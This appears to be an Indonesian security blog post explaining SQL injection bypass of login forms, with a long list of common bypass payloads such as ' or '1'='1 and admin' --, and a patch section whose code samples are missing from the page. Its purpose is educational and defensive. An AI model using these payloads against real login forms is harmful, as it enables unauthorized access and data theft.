sql injections 1

SQL Injection From Form Login

Halo Sobat Helix! SQL Injection adalah jenis serangan yang memungkinkan pengguna memproses query SQL dan kemudian meneruskannya ke server untuk dieksekusi. Ada beberapa metode yang dapat digunakan untuk melakukan serangan melalui SQL Injection, salah satunya melalui form login biasa juga disebut bypass SQL Login maupun bypass admin. Dalam beberapa tahun terakhir, SQL Injection menjadi sangat populer hingga banyak komunitas ataupun kelompok penggemar bug hunting menjadikan SQL Injection sebagai ajang challenge. Bahkan beberapa situs besar tidak kebal terhadap serangan tersebut.

Dalam kasus ini, penyerang menggunakan form di formulir login untuk memasuki sistem dan kemudian menaikkan level dari user menjadi admin. Umumnya, jika seseorang memasukkan nama pengguna dan kata sandi berdasarkan nama pengguna dan kata sandi di database, mereka dapat masuk dengan sukses. Namun dalam hal ini penyerang yang ingin masuk sebagai admin tidak mengetahui apapun tentang username dan password tersebut, sehingga ia harus mencari cara lain untuk masuk melalui form login ini.

Bagaimana Penyerang dapat Menembus Form Login?

query di atas adalah query yang akan mencocokkan konten yang dimasukkan oleh pengguna dengan kata sandi dan data nama pengguna, terlepas dari apakah kata sandi dan nama pengguna ada dalam database. Jadi, bagaimana penyerang melewati query melalui formulir login? Tentu saja, dengan memanipulasi input nama login. Dalam kasus ini, penyerang akan memasukkan nama pengguna dengan ‘or ‘1’=’1, dan sandi = 1 atau apa pun. Memasukkan nama pengguna ‘or ‘1’=’1 dan password = 1 akan menghasilkan query berikut.

Dalam hal ini, query yang dieksekusi akan selalu bernilai true, dan kemudian halaman admin akan ditampilkan. Dalam kasus ini, penyerang tidak akan memiliki nama pengguna dan kata sandi yang benar saat memasukkannya.

Setelah penyerang melewati formulir login, risiko yang dihadapi programmer pada saat itu bergantung pada tujuan penyerang. Penyerang dapat mengubah berita atau mencuri data penting perusahaan. Risiko tertinggi adalah jika penyerang kemudian mengunggah shell (Backdoor) untuk digunakan, ini adalah langkah pertama untuk mengambil alih sistem dari owner asli.

Setelah penyerang mendapatkan akses dari Backdoor tersebut, penyerang dapat melakukan Upload file, edit, mengambil, bahkan melakukan modifikasi ke website seperti Defacing. Paling parah adalah jika penyerang melakukan aksi untuk meenkripsi semua file yang ada pada website (Biasa Di Sebut Ransomware).

Berikut adalah List Nilai yang Sering Digunakan Penyerang untuk Membypass Form Login

  • or 1=1– ”
  • or “1”=”1   
  • “) or (“a”=”a
  • ” or 1=1–            
  • ‘ or 1=1–             
  • tes ” or “a”=”a
  • or 0=0# ‘
  • or = 0=0#          
  • tes’ or ‘a’=’a
  • ” or 0=0#             
  • or 1=1–
  • tes”) or (“a”=”a
  • ‘ or ‘0’=’0             
  • ‘) or (‘a’=’a          
  • tes’) or (‘a’=’a
  • or 1=1– ”
  • or “1”=”1   
  • “) or (“a”=”a
  • ” or 1=1–            
  • ‘ or 1=1–             
  • tes ” or “a”=”a
  • or 0=0# ‘
  • or = 0=0#          
  • tes’ or ‘a’=’a
  • ” or 0=0#             
  • or 1=1–
  • tes”) or (“a”=”a
  • ‘ or ‘0’=’0             
  • ‘) or (‘a’=’a          
  • tes’) or (‘a’=’a
  • ‘or’1=1’
  • and 1=1–
  • and 1=1
  • ‘ or ‘one’=’one–
  • ‘ or ‘one’=’one
  • ‘ and ‘one’=’one
  • ‘ and ‘one’=’one–
  • 1′) and ‘1’=’1–
  • admin’ —
  • admin’ #
  • admin’/*
  • or 1=1–
  • or 1=1#
  • or 1=1/*
  • ) or ‘1’=’1–
  • ) or (‘1’=’1–
  • ‘ or ‘1’=’1
  • ‘ or ‘x’=’x
  • ‘ or 0=0 —
  • ” or 0=0 —
  • or 0=0 —
  • ‘ or 0=0 #
  • ” or 0=0 #
  • or 0=0 #
  • ‘ or ‘x’=’x
  • ” or “x”=”x
  • ‘) or (‘x’=’x
  • ‘ or 1=1–
  • ” or 1=1–
  • or 1=1–
  • ‘ or a=a–
  • ” or “a”=”a
  • ‘) or (‘a’=’a
  • “) or (“a”=”a
  • hi” or “a”=”a
  • hi” or 1=1 —
  • hi’ or 1=1 —
  • ‘or’1=1’
  • ‘ or 1=1 limit 1 — -+

Lalu Bagaimana Cara Patch Bug ini?

Berikut adalah referensi code yang vuln akan bypass dari blog draxploit, Pada code ini tidak terdapat filter bypass pada variabel ‘$usename’ dan ‘$password’. Berikut source code nya

Celah bypass terdapat pada baris berikut

Lalu bagaimana cara menambah filter bypass nya? Berikut code nya

Kita akan mengganti source code sebelumnya yang belum terdapat Filter dengan menambahkan filter nya seperti di bawah Ini

Reference :

edel.staff.unja.ac.id

www.draxploit.web.id

Other Articles

CyberNewsInternetTechnologyTOP NEWS
yt 1200
CyberNewsExploitTechnologyVulnerabilityWeb
vuln 1
0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x